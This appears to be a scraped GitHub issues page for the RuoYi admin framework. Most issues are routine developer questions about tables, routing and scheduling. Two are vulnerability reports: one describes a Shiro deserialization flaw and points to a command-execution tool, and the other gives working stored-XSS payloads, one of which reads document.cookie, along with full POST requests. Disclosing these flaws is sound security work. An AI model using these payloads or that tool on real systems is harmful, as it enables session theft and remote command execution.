
ruoyi's People

Contributors

charlessong, chenfb-git, cschenzz, cyf783, inotgaoshou, john-chan, leonhardt92, lerry903, liuhulu, luwenlong, normal-coder, p19971018, skqing, tenchiwuyo, wangxinxx, yangzhengze, yangzongzhuan, zhangmrit


ruoyi's Issues

bootstrap table throws an error on double-click edit

function queryUserList() {

    var options = {
        url: prefix + "/list",
        createUrl: prefix + "/add",
        updateUrl: prefix + "/edit/{id}",
        removeUrl: prefix + "/remove",
        exportUrl: prefix + "/export",
        modalName: "监控-字典对应",
        showExport: false,
        pagination: false,
        sortName: 'srot',
		sortOrder: 'asc',
        striped: true,
        showRefresh: false,
        uniqueId:"id",
        //onDblClickCell: onDblClickCell,
        onDblClickCell: onDblClickCell,

        columns: [{
            checkbox: false
        },
            {
                field : 'id',
                title : '',
                visible: false
            },
            {
                field : 'xmmc',
                title : '项目名称',
                sortable: true
            },
            {
                field : 'xmbm',
                title : '项目编码',
                sortable: true
            },
            {
                field : 'zdmc',
                title : '字段名称',
                sortable: true
            },
            {
                field : 'zdbm',
                title : '字典编码',
                sortable: true
            },
            {
                field : 'dyzdmc',
                title : '对应字段名称',
                sortable: true
            },
            {
                field : 'dyzdbm',
                title : '对应字段编码',
                sortable: true
            },
            {
                title: '操作',
                align: 'center',
                formatter: function(value, row, index) {
                    var actions = [];
                    // actions.push('<a class="btn btn-success btn-xs ' + editFlag + '" href="javascript:void(0)" onclick="$.operate.edit(\'' + row.id + '\')"><i class="fa fa-edit"></i>编辑</a> ');
                    // actions.push('<a class="btn btn-danger btn-xs ' + removeFlag + '" href="javascript:void(0)" onclick="$.operate.remove(\'' + row.id + '\')"><i class="fa fa-remove"></i>删除</a>');
					var aStr1 = "<a onclick='syncClick(" + index + "," + row.id +")'><i class=\"fa fa-edit\"></i>同步</a>&nbsp;&nbsp;";
					var aStr = "<a onclick='addDy(" + index + "," + row.id +")'>新增对应关系</a>&nbsp;&nbsp;";
                    var aStr2="";
                    if(row.sfxzdygx!='1'){
                        var aStr2 = "<a onclick='del(" + index + "," + row.id +")' shiro:hasPermission=\"system:tEhrJkZddy:remove\">删除</a>"
					}
					//actions.push('<a onclick="addDy(\'' + tEhrJkMain, '\' + \'' + row.id + '\')">新增对应关系</a>')
					actions.push(aStr1);
					actions.push(aStr);
					actions.push(aStr2);
                    return actions.join('');
                }
            }
            ]
    };
    $.table.init(options);
}

function onDblClickCell(field, value, row, $element){
$.operate.edit(row.id);
}

/**
 * @param {field name of the clicked column} field
 * @param {value of the clicked column} value
 * @param {data of the whole clicked row} row
 * @param {td element} $element
 */
function onDblClickCell(field, value, row, $element) {
    if(field == 'dyzdmc' || field == 'dyzdbm') {
        $element.attr('contenteditable', true);
        $element.blur(function () {
            var index = $element.parent().data('index');
            var tdValue = $element.html();

            saveData(index, field, tdValue, row);
        })
    }else{
        $.modal.alertError('只能修改对应字段名称和对应字段编码');
	}
}

gateway startup error

Action:

Consider defining a bean of type 'org.springframework.http.codec.ServerCodecConfigurer' in your configuration.

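org.quartz-scheduler configuration problem across multiple environments

Our development and test environments share the same database, but the development environment's scheduled jobs sometimes run together with the test environment's scheduled jobs, which causes problems. After searching on Baidu, I put scheduling.enabled=false in the configuration file, but it had no effect. Is there a good way to solve the problem of scheduled jobs running together across multiple environments?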

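Second-level menu clicks stop working

Describe the bug

Clicking second-level menu items does nothing. I've been at this all night, please help!!!

A clear and concise description of what the bug is.

I wrote a shared shop header in the project. It doesn't use anything from the admin backend, and the admin backend doesn't reference anything of mine.
None of that is the point; the point is that I wrote an API following the code conventions,

import { getShopUserInfo, getAllCount } from '@/api/shopCommon'

After importing it this way the code runs without errors and can fetch data from the backend.
But this line of code affects the admin backend's second-level menu: clicks stop working.
The first-level menu still works; clicking it displays content.
I'm baffled. I went through the routes from top to bottom and couldn't find any clue.

To Reproduce

Steps to reproduce the behavior:

The detailed code follows, slightly trimmed to make it easier to check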

/src/views/Shop/GloabalHeader/GloabalHeader.vue

import { userInfo, allCount } from '@/api/shop/common'
export default {
  name: 'GlobalHeader',
  methods: {
    async getUserInfo () {
      await userInfo().then(res => {
        const location = res.data.loginIp
        const name = res.data.userName
        const depart = res.data.deptName
        this.location = location
        this.name = name
        this.depart = depart
      })
    },
    async refreshAllCount () {
      await allCount().then(res=>{
        const myselectCount = res.data.myselectCount
        const myRecomCount = res.data.myRecomCount
        const myOrderFormCount = res.data.myOrderFormCount
        const mySubscribeCount = res.data.mySubscribeCount
        this.myselectCount = myselectCount
        this.myRecomCount = myRecomCount
        this.myOrderFormCount = myOrderFormCount
        this.mySubscribeCount = mySubscribeCount
      })
    }
  }
}

/src/views/Shop/GloabalHeader/index.js

import GlobalHeader from './GlobalHeader'
export default GlobalHeader

/src/api/shop/common.js

import { shopAxios } from '@/utils/request'
const api = {
  userInfo:"/shop/index/loginUserInfo",
  allCount:'/shop/index/allCount'
}
export function userInfo(){
	return shopAxios({
		url:api.userInfo,
		method:'get'
	})
}
export function allCount(){
	return shopAxios({
		url:api.allCount,
		method:'get'
	})
}

Repository URL: pending...

normal first-level menu

#### normal second-level menu

#### error first-level menu

#### error second-level menu

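Adding a third-level route under a second-level route

A second-level route page has a "view details" click that opens a third-level route page. How do I add that route so that it is not shown in the sidebar navigation, and so that the breadcrumb records the parent route?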

Wrong code modification leads to Shiro deserialization vulnerability

The cause of the vulnerability
The project uses Shiro version 1.7.0; this version should not have this vulnerability.
Code-level troubleshooting:

  1. The default key is used (one of the reasons for this vulnerability).
  2. Judging from the exploited gadget, the commons-collections exploit chain is used (the second reason for this vulnerability); commons-collections should be at version 3.2.2 or above.
  3. Check the Shiro-related calling code:
    The Shiro deserialization vulnerability is caused by calling the getRememberedSerializedIdentity() function of the CookieRememberMeManager class. The official repair code is as follows; the repair plan is to delete the CookieRememberMeManager class.
    The CookieRememberMeManager class was added when the open source project was rewritten, which led to the vulnerability.

Exploit:
You can use the following tool to exploit this vulnerability, GitHub project: https://github.com/j1anFen/shiro_attack
Execute system commands
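
The report above names two conditions behind the finding: a default rememberMe key and a commons-collections version below 3.2.2. As an added example (not part of the original report and not RuoYi's code), this script checks pom.xml text and Shiro configuration source for both; the sample pom, the sample Java snippet and its placeholder key are constructed, and it assumes the key is configured through `setCipherKey` with a string literal.

```javascript
// Added example, not RuoYi code. Both sample inputs are constructed.
const SAMPLE_POM = `
<dependency>
  <groupId>org.apache.shiro</groupId>
  <artifactId>shiro-core</artifactId>
  <version>1.7.0</version>
</dependency>
<dependency>
  <groupId>commons-collections</groupId>
  <artifactId>commons-collections</artifactId>
  <version>3.2.1</version>
</dependency>`;
const SAMPLE_CONFIG = `
CookieRememberMeManager manager = new CookieRememberMeManager();
manager.setCipherKey(Base64.decode("CONSTRUCTED-PLACEHOLDER-KEY=="));`;

// Negative when dotted numeric version a is lower than b.
function compareVersions(a, b) {
  const pa = a.split('.').map(Number), pb = b.split('.').map(Number);
  for (let i = 0; i < Math.max(pa.length, pb.length); i++) {
    const d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

// Report commons-collections declared below 3.2.2 in pom.xml text.
function auditPom(pomXml) {
  const findings = [];
  for (const [, body] of pomXml.matchAll(/<dependency>([\s\S]*?)<\/dependency>/g)) {
    const artifact = (/<artifactId>\s*([^<\s]+)/.exec(body) || [])[1];
    const version = (/<version>\s*([^<\s]+)/.exec(body) || [])[1];
    if (artifact !== 'commons-collections') continue;
    if (!version || !/^\d+(\.\d+)*$/.test(version)) {
      findings.push('commons-collections version not literal; resolve it and recheck');
    } else if (compareVersions(version, '3.2.2') < 0) {
      findings.push('commons-collections ' + version + ' is below 3.2.2');
    }
  }
  return findings;
}

// Report rememberMe cipher keys written as string literals in Java source.
function auditShiroConfig(javaSource) {
  const literal = /setCipherKey\s*\(\s*(?:[\w.]+\s*\(\s*)?"[^"]*"/g;
  return (javaSource.match(literal) || [])
    .map(() => 'rememberMe cipher key is a string literal in source');
}

console.log(auditPom(SAMPLE_POM), auditShiroConfig(SAMPLE_CONFIG));
```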

There are two XSS vulnerabilities

After the administrator has logged in, open the following page:
System management -> Notice notice
Then add the following XSS statement to the announcement title:
poc: ”><sCript>alert`xss`</SCript>
Here is the POST request:

POST /system/notice/edit HTTP/1.1
Host: localhost
Content-Length: 219
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/system/notice/edit/10
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0dc0e965-0a6a-4e08-bb4e-0e4b600be71f
Connection: close

noticeId=10&noticeTitle=%E2%80%9D%3E%3CsCript%3Ealert%60xss%60%3C%2FSCript%3E&noticeType=1&noticeContent=%3Cp%3E%E2%80%9D%26gt%3B%26lt%3BsCript%26gt%3Balert%60xss%60%26lt%3B%2FSCript%26gt%3B%3Cbr%3E%3C%2Fp%3E&status=0&=

After the administrator has logged in, open the following page:
System tools -> code generation
Then click Import, select any entry and click OK. Then click Edit, click basic information, and enter the following XSS statement in the table name field:
poc2: ')" onmousemove=alert(document.cookie) a=(1
Here is the POST request:

POST /tool/gen/edit HTTP/1.1
Host: localhost
Content-Length: 3880
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/tool/gen/edit/1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=0dc0e965-0a6a-4e08-bb4e-0e4b600be71f
Connection: close

tableId=1&tableName=')%22+onmousemove%3Dalert(document.cookie)+a%3D(1&tableComment=%E9%80%9A%E7%9F%A5%E5%85%AC%E5%91%8A%E8%A1%A8&className=SysNotice&functionAuthor=ruoyi&remark=&columns%5B0%5D.columnId=1&columns%5B0%5D.sort=1&columns%5B0%5D.columnComment=%E5%85%AC%E5%91%8AID&columns%5B0%5D.javaType=Integer&columns%5B0%5D.javaField=noticeId&columns%5B0%5D.isInsert=1&columns%5B0%5D.queryType=EQ&columns%5B0%5D.htmlType=input&columns%5B0%5D.dictType=&columns%5B1%5D.columnId=2&columns%5B1%5D.sort=2&columns%5B1%5D.columnComment=%E5%85%AC%E5%91%8A%E6%A0%87%E9%A2%98&columns%5B1%5D.javaType=String&columns%5B1%5D.javaField=noticeTitle&columns%5B1%5D.isInsert=1&columns%5B1%5D.isEdit=1&columns%5B1%5D.isList=1&columns%5B1%5D.isQuery=1&columns%5B1%5D.queryType=EQ&columns%5B1%5D.isRequired=1&columns%5B1%5D.htmlType=input&columns%5B1%5D.dictType=&columns%5B2%5D.columnId=3&columns%5B2%5D.sort=3&columns%5B2%5D.columnComment=%E5%85%AC%E5%91%8A%E7%B1%BB%E5%9E%8B%EF%BC%881%E9%80%9A%E7%9F%A5+2%E5%85%AC%E5%91%8A%EF%BC%89&columns%5B2%5D.javaType=String&columns%5B2%5D.javaField=noticeType&columns%5B2%5D.isInsert=1&columns%5B2%5D.isEdit=1&columns%5B2%5D.isList=1&columns%5B2%5D.isQuery=1&columns%5B2%5D.queryType=EQ&columns%5B2%5D.isRequired=1&columns%5B2%5D.htmlType=select&columns%5B2%5D.dictType=&columns%5B3%5D.columnId=4&columns%5B3%5D.sort=4&columns%5B3%5D.columnComment=%E5%85%AC%E5%91%8A%E5%86%85%E5%AE%B9&columns%5B3%5D.javaType=String&columns%5B3%5D.javaField=noticeContent&columns%5B3%5D.isInsert=1&columns%5B3%5D.isEdit=1&columns%5B3%5D.isList=1&columns%5B3%5D.isQuery=1&columns%5B3%5D.queryType=EQ&columns%5B3%5D.htmlType=summernote&columns%5B3%5D.dictType=&columns%5B4%5D.columnId=5&columns%5B4%5D.sort=5&columns%5B4%5D.columnComment=%E5%85%AC%E5%91%8A%E7%8A%B6%E6%80%81%EF%BC%880%E6%AD%A3%E5%B8%B8+1%E5%85%B3%E9%97%AD%EF%BC%89&columns%5B4%5D.javaType=String&columns%5B4%5D.javaField=status&columns%5B4%5D.isInsert=1&columns%5B4%5D.isEdit=1&columns%5B4%5D.isList=1&columns%5B4%5D.isQuery=1&colu
mns%5B4%5D.queryType=EQ&columns%5B4%5D.htmlType=radio&columns%5B4%5D.dictType=&columns%5B5%5D.columnId=6&columns%5B5%5D.sort=6&columns%5B5%5D.columnComment=%E5%88%9B%E5%BB%BA%E8%80%85&columns%5B5%5D.javaType=String&columns%5B5%5D.javaField=createBy&columns%5B5%5D.isInsert=1&columns%5B5%5D.queryType=EQ&columns%5B5%5D.htmlType=input&columns%5B5%5D.dictType=&columns%5B6%5D.columnId=7&columns%5B6%5D.sort=7&columns%5B6%5D.columnComment=%E5%88%9B%E5%BB%BA%E6%97%B6%E9%97%B4&columns%5B6%5D.javaType=Date&columns%5B6%5D.javaField=createTime&columns%5B6%5D.isInsert=1&columns%5B6%5D.queryType=EQ&columns%5B6%5D.htmlType=datetime&columns%5B6%5D.dictType=&columns%5B7%5D.columnId=8&columns%5B7%5D.sort=8&columns%5B7%5D.columnComment=%E6%9B%B4%E6%96%B0%E8%80%85&columns%5B7%5D.javaType=String&columns%5B7%5D.javaField=updateBy&columns%5B7%5D.isInsert=1&columns%5B7%5D.isEdit=1&columns%5B7%5D.queryType=EQ&columns%5B7%5D.htmlType=input&columns%5B7%5D.dictType=&columns%5B8%5D.columnId=9&columns%5B8%5D.sort=9&columns%5B8%5D.columnComment=%E6%9B%B4%E6%96%B0%E6%97%B6%E9%97%B4&columns%5B8%5D.javaType=Date&columns%5B8%5D.javaField=updateTime&columns%5B8%5D.isInsert=1&columns%5B8%5D.isEdit=1&columns%5B8%5D.queryType=EQ&columns%5B8%5D.htmlType=datetime&columns%5B8%5D.dictType=&columns%5B9%5D.columnId=10&columns%5B9%5D.sort=10&columns%5B9%5D.columnComment=%E5%A4%87%E6%B3%A8&columns%5B9%5D.javaType=String&columns%5B9%5D.javaField=remark&columns%5B9%5D.isInsert=1&columns%5B9%5D.isEdit=1&columns%5B9%5D.isList=1&columns%5B9%5D.queryType=EQ&columns%5B9%5D.htmlType=input&columns%5B9%5D.dictType=&tplCategory=crud&packageName=com.ruoyi.system&moduleName=system&businessName=notice&functionName=%E9%80%9A%E7%9F%A5%E5%85%AC%E5%91%8A&params%5BparentMenuId%5D=&params%5BparentMenuName%5D=&genType=0&genPath=%2F&subTableName=&params%5BtreeCode%5D=&params%5BtreeParentCode%5D=&params%5BtreeName%5D=
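
Both requests above store text that is later written into a page. As an added example (not part of the original report and not RuoYi's code), the script below decodes the two field values from those POST bodies and compares concatenating them into markup with encoding them on output. Where RuoYi renders these fields is not shown on the page, so the `preview()` inline handler, the `js-preview` class and all function names are hypothetical.

```javascript
// Added example, not RuoYi code. Function names, the preview() handler and
// the js-preview class are hypothetical; inputs are the two field values
// copied from the POST bodies in the report.
const formDecode = s => decodeURIComponent(s.replace(/\+/g, ' '));
const NOTICE_TITLE = formDecode('%E2%80%9D%3E%3CsCript%3Ealert%60xss%60%3C%2FSCript%3E');
const TABLE_NAME = formDecode("')%22+onmousemove%3Dalert(document.cookie)+a%3D(1");

// Encode for HTML text and quoted-attribute contexts.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;',
                '"': '&quot;', "'": '&#39;', '`': '&#96;' };
  return String(value).replace(/[&<>"'`]/g, ch => map[ch]);
}

// Before: stored text concatenated into markup and into an inline handler.
function unsafeTitleCell(title) { return '<td>' + title + '</td>'; }
function unsafeLink(name) {
  return '<a onclick="preview(\'' + name + '\')">preview</a>';
}

// After: text is encoded, and the value travels in a data-* attribute that a
// delegated listener reads via element.dataset, never inside script text.
function safeTitleCell(title) { return '<td>' + escapeHtml(title) + '</td>'; }
function safeLink(name) {
  return '<a class="js-preview" data-table="' + escapeHtml(name) + '">preview</a>';
}

// Attribute names found in the first start tag; an extra name means the
// input escaped its attribute and created a new one.
function attributeNames(html) {
  const names = [];
  const open = /^<[a-zA-Z][a-zA-Z0-9]*/.exec(html);
  if (!open) return names;
  const attr = /\s+([^\s=>"'\/]+)(?:=(?:"[^"]*"|'[^']*'|[^\s>]+))?/y;
  attr.lastIndex = open[0].length;
  let m;
  while ((m = attr.exec(html)) !== null) names.push(m[1].toLowerCase());
  return names;
}

console.log(attributeNames(unsafeLink(TABLE_NAME))); // extra attributes appear
console.log(attributeNames(safeLink(TABLE_NAME)));
console.log(safeTitleCell(NOTICE_TITLE));
```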

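UserAgentUtils memory overflow

eu.bitwalker.UserAgentUtils
I suggest removing untrusted third-party jars; jars that have not been proven in practice always cause all kinds of problems.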
